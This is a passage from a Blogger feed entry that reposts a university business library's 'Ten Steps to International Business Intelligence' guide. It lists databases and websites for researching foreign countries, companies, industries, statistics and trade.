title="Doing Business" href="http://www.doingbusiness.org/" target="_blank"&gt;Doing Business&lt;/a&gt; is the World Bank's portal that provide's objective measures of business regulations and their enforcement across 183 economis and selected cities at the subnational and regional level. &lt;a href="http://www.library.hbs.edu/countries/countryindex.htm"&gt;Baker Library’s Country Guides&lt;/a&gt; are useful guides to country-related Web sites. &lt;a title="FITA" href="http://www.fita.org/" target="_blank"&gt;FITA&lt;/a&gt; (Federation of International Trade Associations) has excellent country profiles with links to sources.  &lt;a href="http://www.hlbi.com/DBI_list.asp"&gt;HLB International's "Doing Business in..."&lt;/a&gt; guides are free sources of information on foreign countries. &lt;a href="http://www.loc.gov/rr/international/portals.html"&gt;Portals to the World&lt;/a&gt; are "links to electronic resources selected by Library of Congress subject experts.". The &lt;a href="http://www.cia.gov/cia/publications/factbook/"&gt;CIA's World Factbook&lt;/a&gt; s a widely cited sources of basic statistical information.  The &lt;a href="http://www.worldbank.org/elibrary/"&gt;World Bank e-Library&lt;/a&gt; has extensive downloadable books and reports on countries and regions that focus on social and economic development. Two notable examples are the annual World Development Report and Doing Business In. &lt;a title="FDI.net link" href="http://www.fdi.net/" target="_blank"&gt;FDI.net&lt;/a&gt; is the Investment Promotion Network sponsored by the World Bank. It organizes more than 12,000 Web-based documents in a searchable database.  &lt;a title="Wikipedia's List of Sovereign States" href="http://en.wikipedia.org/wiki/List_of_sovereign_states" target="_blank"&gt;Wikipedia's List of Sovereign States&lt;/a&gt; links to detailed country reports with links to references.  You may also wish to visit  &lt;a href="http://dir.yahoo.com/Regional/Countries/"&gt;Yahoo! Countries&lt;/a&gt; or use &lt;a title="Google" href="http://www.google.com/" target="_blank"&gt;Google&lt;/a&gt; or &lt;a title="Bing" href="http://www.bing.com/" target="_blank"&gt;Bing&lt;/a&gt; to locate additional sources. &lt;a href="http://galenet.galegroup.com/servlet/eBooks?ste=22&amp;amp;docNum=CX3401799999" target="_blank"&gt;Countries and Their Cultures&lt;/a&gt; [GN307 .C68 2001 Ref] is a four volume encyclopedia of individual country customs and cultures that is available online and in print. Canada's Centre for Intercultural Learning has developed &lt;a title="Country Insights" href="http://www.intercultures.ca/cil-cai/countryinsights-apercuspays-eng.asp" target="_blank"&gt;Country Insights&lt;/a&gt;, a site that provides insightful information on the cultural characteristics of countries around the world including the U.S. &lt;a href="http://www.kwintessential.co.uk/resources/country-profiles.html"&gt;Kwintessential Country Profiles&lt;/a&gt; is a British site that provides free information on "understanding other people's languages, cultures, etiquettes and taboos" for the traveler of visiting business person. &lt;a title="Culture Crossing" href="http://www.culturecrossing.net/" target="_blank"&gt;Culture Crossing&lt;/a&gt; is "a community built guide to cross-cultural etiquette &amp;amp; understanding" with detailed guides for individual countries. &lt;a href="http://new.sourceoecd.org/"&gt;SourceOECD&lt;/a&gt; has in depth economic, financial and international trade data and country reports for all of the major economies and the emerging markets. The World Bank's &lt;a href="http://www.doingbusiness.org/"&gt;Doing Business&lt;/a&gt; database provides comparative data on the cost of doing business across 155 economies. The World Bank has developed outstanding Web sites on &lt;a href="http://www.pri-center.com/"&gt;Political Risk Insurance&lt;/a&gt; and &lt;a href="http://www.fdi.net/"&gt;Foreign Direct Investment&lt;/a&gt; that explain these subjects in depth and link to resources on these topics by country. The Political Risk Yearbook reports on individual countries are available in &lt;a href="http://search.ebscohost.com/Login.aspx?authtype=ip,uid&amp;amp;profile=bsi"&gt;Business Source Premier&lt;/a&gt;. Culturgrams [GT150 .C85 Ref Res] provide insight to customs and cultures of 177 countries. The Political Risk Yearbook [HB3730 .P762 Ref] is an annual multi-volume work thoroughly analyzing political, economic and investment risk in more than 100 countries.&lt;br /&gt;3)  Research International Companies&lt;br /&gt;&lt;a title="Hoover's" href="http://premium.hoovers.com//" target="_blank"&gt;Hoover's Online&lt;/a&gt;, &lt;a title="OneSource" href="http://www.uflib.ufl.edu/onesource/redirect.asp" target="_blank"&gt;OneSource&lt;/a&gt;, &lt;a href="http://research.thomsonib.com/gaportal/?ExpressCode=uflbasic"&gt;Thomson Research&lt;/a&gt;, and &lt;a href="http://global.factiva.com/en/sess/login.asp?xsid=S003WvfZcnyMTZyMTAoOT6vNpEqMtmm5DFHY96oYqZlNFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"&gt;Factiva&lt;/a&gt; all have reports on international publicly traded companies. The reports include company profiles, news and articles, annual reports, SEC filings, financials and stock market performance data. &lt;a title="MarketLine" href="http://www.marketlineinfo.com/library/" target="_blank"&gt;MarketLine&lt;/a&gt; features in-depth comapny profiles on more than 50,000 U.S. and international private and public companies.  &lt;a href="http://banker.thomsonib.com/ta/?ExpressCode=uflbasic"&gt;Thomson One Banker&lt;/a&gt;  provides worldwide company reports, analytics and market data. &lt;a title="Investext on OneSource" href="http://www.uflib.ufl.edu/onesource/redirect.asp" target="_blank"&gt;Investext on OneSource&lt;/a&gt; has a selection of investment research reports written by leading firms that evaluate the investment outlook and performance for leading companies and industries worldwide.  You can also search &lt;a title="ABI/INFORM" href="http://businesslibrary.uflib.ufl.edu/undefined" target="_blank"&gt;ABI/INFORM&lt;/a&gt;, &lt;a href="http://search.ebscohost.com/?authtype=ip,uid&amp;amp;profile=bsi"&gt;Business Source Premier&lt;/a&gt;, &lt;a title="Factriva" href="http://global.factiva.com/en/sess/login.asp?xsid=S003WvfZcnyMTZyMTAoOT6vNpEqMtmm5DFHY96oYqZlNFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB" target="_blank"&gt;Factiva&lt;/a&gt; and the other &lt;a title="Article Database" href="http://businesslibrary.uflib.ufl.edu/articles" target="_blank"&gt;Article Databases&lt;/a&gt; for articles about international companies. Two leading online financial services, Bloomberg and Datastream, are available on the Business Workstations.  The &lt;a href="http://businesslibrary.uflib.ufl.edu/companyresearch" target="_blank"&gt;Company Research Tutorial&lt;/a&gt; outlines Ten Steps to Company Intelligence. Most of these steps apply to international as well as U.S. companies. &lt;a title="Europages" href="http://www.europages.com/" target="_blank"&gt;Europages&lt;/a&gt;, &lt;a title="Kompass" href="http://www.kompass.com/" target="_blank"&gt;Kompass&lt;/a&gt;, &lt;a title="Thomson Global Register" href="http://www.thomasglobal.com/" target="_blank"&gt;Thomson Global Register&lt;/a&gt;, and other &lt;a title="Company Directories" href="http://globaledge.msu.edu/ResourceDesk/companyDirectories.asp" target="_blank"&gt;Company Directories&lt;/a&gt; offer company profiles and contact information. You may use the directories in the &lt;a title="Company Information Center" href="http://businesslibrary.uflib.ufl.edu/company" target="_blank"&gt;Company Information Center&lt;/a&gt; to locate companies and/or the search engines such as &lt;a title="Google" href="http://www.google.com/" target="_blank"&gt;Google&lt;/a&gt; and &lt;a title="Yahoo!" href="http://www.yahoo.com/" target="_blank"&gt;Yahoo!&lt;/a&gt; to find company home pages.&lt;br /&gt;4)  Investigate International Industries and Markets&lt;br /&gt;&lt;a title="IBISWorld" href="http://www.ibisworld.com/" target="_blank"&gt;IBISWorld U.S. &amp;amp; Global Industry Reports&lt;/a&gt; features over 700 reports on U.S. industries and a growing collection of global industry reports. The U.S. reports are written at the 5-digit level of the North American Industry Classification System (NAICS). Each report of about 25-30 pages uses Michael Porter's "Five Competitive Forces" framework. &lt;a href="http://infotrac.galegroup.com/itweb/?db=BCRC"&gt;Gale's Business &amp;amp; Company Resource Center&lt;/a&gt; features essays on major global industries. &lt;a title="Investext on OneSource" href="http://www.uflib.ufl.edu/onesource/redirect.asp" target="_blank"&gt;Investext on OneSource&lt;/a&gt; has a selection investment research reports covering  major international industries and their leading companies.  Euromonitor International's &lt;a href="http://www.portal.euromonitor.com/"&gt;GMID: Global Market Information Database&lt;/a&gt; is an online database providing business intelligence on countries, consumers and industries. It offers integrated access to statistics, market reports, company profiles and information sources. 205 countries are researched, with extended coverage of 52. It includes Market Research Monitor. &lt;a title="MarketLine" href="http://www.marketlineinfo.com/library/" target="_blank"&gt;MarketLine&lt;/a&gt; is an international market research database that has thousands of industry analyses utilizing Michael Porter's Five Forces framework to create industry scorecards. &lt;a href="http://www.bi-interactive.com/"&gt;Business Insights&lt;/a&gt; offers international market research reports on Consumer Goods, Energy, Financial Services, Healthcare, Technology, Telecoms, eCommerce and Human Resources. &lt;a href="http://academic.mintel.com/"&gt;Mintel&lt;/a&gt; publishes hundreds of market research reports covering the U.S., UK and European consumer markets and lifestyles. The &lt;a href="http://search.rdsinc.com/sessions?products=BNI"&gt;Business &amp;amp; Industry Database&lt;/a&gt; covers many foreign trade journals and newspapers as well as U.S. sources. The U.S. Commercial Service publishes a &lt;a href="http://www.buyusainfo.net/adsearch2.cfm"&gt;Market Research Library&lt;/a&gt; with detailed country and industry research reports to help U.S. businesses export. &lt;a href="http://businesslibrary.uflib.ufl.edu/undefined"&gt;ABI/INFORM&lt;/a&gt;, &lt;a href="http://search.ebscohost.com/?authtype=ip,uid&amp;amp;profile=bsi"&gt;Business Source Premier&lt;/a&gt;, &lt;a href="http://global.factiva.com/en/sess/login.asp?xsid=S003WvfZcnyMTZyMTAoOT6vNpEqMtmm5DFHY96oYqZlNFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"&gt;Factiva&lt;/a&gt;, &lt;a href="http://www.lexisnexis.com/us/lnacademic"&gt;Lexis-Nexis&lt;/a&gt; and the other &lt;a title="Article Databases" href="http://web.uflib.ufl.edu/cm/business/articles.htm" target="_blank"&gt;Article Databases&lt;/a&gt; provide thorough coverage of international markets. The reports in &lt;a href="http://www.netadvantage.standardandpoors.com/"&gt;Standard &amp;amp; Poor’s Industry Surveys&lt;/a&gt; focus on both the U.S. and international industries. You may profit from reviewing the steps to industry research found in the &lt;a title="Industry Research Tutorial" href="http://businesslibrary.uflib.ufl.edu/industryresearch" target="_blank"&gt;Industry Research Tutorial&lt;/a&gt;.&lt;br /&gt;5)  Locate Key International Data and Statistics&lt;br /&gt;Both &lt;a title="GMID" href="http://www.portal.euromonitor.com/" target="_blank"&gt;GMID&lt;/a&gt; and &lt;a title="MarketLine" href="http://www.marketlineinfo.com/library/" target="_blank"&gt;MarketLine&lt;/a&gt; feature extensive data on products, markets, countries, economics and demographics.&lt;a href="http://search.rdsinc.com/sessions?products=TBL"&gt; TableBase&lt;/a&gt; is an international database that specializes exclusively in tabular data dealing with companies, industries, products and demographics. &lt;a href="http://www.uflib.ufl.edu/"&gt;Smathers Libraries&lt;/a&gt; has many of the sources referred to. The &lt;a title="Articles" href="http://web.uflib.ufl.edu/cm/business/articles.htm" target="_blank"&gt;Article Databases&lt;/a&gt; often contain data relevant for international research. &lt;a href="http://www.viewswire.com/"&gt;EIU Viewswire&lt;/a&gt; has five-year economic forecasts for each country that can be downloaded as Excel files. &lt;a href="http://corporate.dismal.com/"&gt;The Dismal Scientist&lt;/a&gt; tracks economic conditions around the world including Asia, Europe and Latin America. &lt;a href="http://new.sourceoecd.org/"&gt;SourceOECD&lt;/a&gt; has detailed economic, financial and trade data for many countries. &lt;a href="http://www.imfstatistics.org/"&gt;IFS Online&lt;/a&gt; (IMF) is the International Monetary Fund's online database of financial data by country. The &lt;a href="http://www.imf.org/"&gt;IMF&lt;/a&gt;, &lt;a href="http://www.oecd.org/"&gt;OECD&lt;/a&gt; and the &lt;a href="http://www.worldbank.org/"&gt;World Bank&lt;/a&gt; all have financial, economic and country data on their Web sites. &lt;a href="http://ddp-ext.worldbank.org/ext/DDPQQ/member.do?method=getMembers&amp;amp;userid=1&amp;amp;queryId=6"&gt;World Development Indicators Online&lt;/a&gt; is the most comprehensive database for comparative economic and social indicators. &lt;a href="https://www.globalfinancialdata.com/"&gt;Global Financial Data&lt;/a&gt; is an unparalleled source for historical stock market, financial, and economic data for more than 200 countries. You can use both Bloomberg and Datastream on the Business Workstations for international economic and financial data.&lt;br /&gt;6)  Explore International Business World Wide Web Sites&lt;br /&gt;&lt;a href="http://globaledge.msu.edu/ibrd/ibrd.asp"&gt;globalEDGE&lt;/a&gt; is a comprehensive directory of Web sites related to international business studies. The websites listed in the right-hand column of the &lt;a title="International Business" href="http://businesslibrary.uflib.ufl.edu/internationalbusiness" target="_blank"&gt;International Business Information Center&lt;/a&gt; offer a wealth of information about countries, business customs, exporting, importing, doing business in foreign countries, and a host of other topics. Mouse over the links to see brief descriptions of the sites.&lt;br /&gt;7)  Investigate International Trade Resources&lt;br /&gt;&lt;a title="Export.gov" href="http://www.export.gov/" target="_blank"&gt;Export.gov&lt;/a&gt; is the United States Commercial Service's export portal. Here you will find market research, trade leads, and other exporting resources including, &lt;a href="http://www.unzco.com/basicguide/index.html"&gt;A Basic Guide to Exporting&lt;/a&gt;. The State Department’s &lt;a href="http://www.state.gov/www/about_state/business/com_guides/"&gt;Country Commercial Guides&lt;/a&gt; are comprehensive overviews of foreign markets prepared annually by embassy staff. &lt;a href="http://www.exportall.com/"&gt;Exportall&lt;/a&gt;, &lt;a href="http://www.fita.org/"&gt;FITA&lt;/a&gt;, &lt;a href="http://www.tradeport.org/"&gt;TradePort&lt;/a&gt; and &lt;a href="http://www.tradecompass.com/"&gt;Trade Compass&lt;/a&gt; are four  international trade portals on the Web that have good free content. &lt;a href="http://www.viewswire.com/"&gt;EIU Viewswire&lt;/a&gt; has detailed information about foreign exchange, tax and trade regulations for each country.  &lt;a href="http://businesslibrary.uflib.ufl.edu/undefined"&gt;ABI/INFORM&lt;/a&gt;, &lt;a href="http://global.factiva.com/en/sess/login.asp?xsid=S003WvfZcnyMTZyMTAoOT6vNpEqMtmm5DFHY96oYqZlNFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"&gt;Factiva&lt;/a&gt;, &lt;a href="http://www.lexisnexis.com/us/lnacademic"&gt;Lexis-Nexis&lt;/a&gt; and the other article databases provide thorough coverage of international trade topics. D&amp;amp;B’s Exporter’s Encyclopedia [HF 3011 .E9 Bus Ref] is an impotant print publication in Business Reference. See the &lt;a title="International Business information" href="http://businesslibrary.uflib.ufl.edu/internationalbusiness" target="_blank"&gt;International Business Information Center&lt;/a&gt; for additional sources.&lt;br /&gt;8)  Research International Public Policy Issues&lt;br /&gt;Many public policy issues impact the international business environment. You can research the World Trade Organization, globalization, sustainable development, foreign direct investment and many other issues using &lt;a href="http://www.ciaonet.org/"&gt;CIAO&lt;/a&gt; and &lt;a href="http://www.policyfile.com/"&gt;Policy File&lt;/a&gt;. &lt;a href="http://www.ciaonet.org/"&gt;CIAO&lt;/a&gt; is Columbia International Affairs Online, a database of articles, working papers, conference proceedings and other materials. &lt;a href="http://www.policyfile.com/"&gt;Policy File&lt;/a&gt; is a database of research from universities, public policy think tanks and other organizations including the American Enterprise Institute, Brookings, the Council on Foreign Relations, the Hoover Institution, the IMF, the Institute for International Economics, and many others. You can further explore the literature by utilizing &lt;a href="http://gateway.fcla.edu/cgi-bin/cgiwrap/~fclwptl/Webgateway/Webgateway?CSA"&gt;PAIS&lt;/a&gt; and &lt;a href="http://search.ebscohost.com/"&gt;EconLit&lt;/a&gt;, the Social Science Citation Index in the &lt;a href="http://isiknowledge.com/"&gt;Web of Knowledge&lt;/a&gt;, &lt;a title="ABI/INFORM" href="http://businesslibrary.uflib.ufl.edu/undefined" target="_blank"&gt;ABI/INFORM&lt;/a&gt; and the other Article Databases. Search &lt;a href="http://uf.catalog.fcla.edu/"&gt;UF Libraries' Catalog&lt;/a&gt; by author, title, subject or keyword to find additional books and reports held by the Libraries. Our &lt;a href="http://web.uflib.ufl.edu/docs/"&gt;Government Documents Department&lt;/a&gt; is a depository for UN, U.S., OECD and European Union documents.&lt;br /&gt;9)  Browse Core Collections of International Business Books&lt;br /&gt;The Business Library contains core collections of books on &lt;a title="African Business" href="http://web.uflib.ufl.edu/cm/business/books/africabks.htm" target="_blank"&gt;African Business&lt;/a&gt;,  &lt;a title="Asian Business" href="http://web.uflib.ufl.edu/cm/business/books/asiabks.htm" target="_blank"&gt;Asian Business&lt;/a&gt;, &lt;a title="China Business" href="http://web.uflib.ufl.edu/cm/business/books/chinabks.htm" target="_blank"&gt;China Business&lt;/a&gt;, &lt;a title="European Business" href="http://web.uflib.ufl.edu/cm/business/books/eurobks.htm" target="_blank"&gt;European Business&lt;/a&gt;, &lt;a title="Globalization" href="http://web.uflib.ufl.edu/cm/business/books/globalbks.htm" target="_blank"&gt;Globalization&lt;/a&gt;, &lt;a title="International Business" href="http://web.uflib.ufl.edu/cm/business/books/ibusbks.htm" target="_blank"&gt;International Business&lt;/a&gt;, &lt;a title="International Finance" href="http://web.uflib.ufl.edu/cm/business/books/ifinbks.htm" target="_blank"&gt;International Finance&lt;/a&gt;, &lt;a title="International Finance" href="http://web.uflib.ufl.edu/cm/business/books/iinvbks.htm" target="_blank"&gt;International Investment&lt;/a&gt;, &lt;a title="International Management" href="http://web.uflib.ufl.edu/cm/business/books/imgmtbks.htm" target="_blank"&gt;International Management&lt;/a&gt;, &lt;a title="International Marketing" href="http://web.uflib.ufl.edu/cm/business/books/imktgbks.htm" target="_blank"&gt;International Marketing&lt;/a&gt;, &lt;a title="International Trade" href="http://web.uflib.ufl.edu/cm/business/books/itradbks.htm" target="_blank"&gt;International Trade&lt;/a&gt;, &lt;a title="Latin America" href="http://web.uflib.ufl.edu/cm/business/books/labusbks.htm" target="_blank"&gt;Latin American Business&lt;/a&gt; and the &lt;a title="World Economy" href="http://web.uflib.ufl.edu/cm/business/books/weconbks.htm" target="_blank"&gt;World Economy&lt;/a&gt;. You may search &lt;a href="http://uf.catalog.fcla.edu/"&gt;UF Libraries' Catalog&lt;/a&gt; by author, title, subject or keyword to find additional books held by the Libraries. Or browse &lt;a href="http://library.books24x7.com/topics.asp"&gt;Books24x7&lt;/a&gt;, &lt;a href="http://www.netlibrary.com/"&gt;netLibrary&lt;/a&gt; and the &lt;a href="http://www.worldbank.org/elibrary/"&gt;World Bank e-Library&lt;/a&gt; for eBooks. &lt;a href="http://www.netlibrary.com/ebook_info.asp?product_id=23702&amp;amp;piclist=19799,20772,21248"&gt;The Global Entrepreneur&lt;/a&gt; is an excellent example of a valuable book available both in print and electronically.&lt;br /&gt;10)  Conclusion&lt;br /&gt;Use the &lt;a title="International Business Information" href="http://businesslibrary.uflib.ufl.edu/internationalbusiness" target="_blank"&gt;International Business Information Center&lt;/a&gt; to link to the most important &lt;a title="Databases" href="http://businesslibrary.uflib.ufl.edu/databases" target="_blank"&gt;Databases&lt;/a&gt;, &lt;a title="Articles" href="http://web.uflib.ufl.edu/cm/business/articles.htm" target="_blank"&gt;Articles&lt;/a&gt;, Web sites and other sources for keeping abreast of international business and to identify sources for researching international companies, industries and markets.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-2093561440240203155?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/2093561440240203155/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=2093561440240203155&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/2093561440240203155'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/2093561440240203155'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/04/ten-steps-to-international-business.html' title='Ten Steps to International Business Intelligence'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
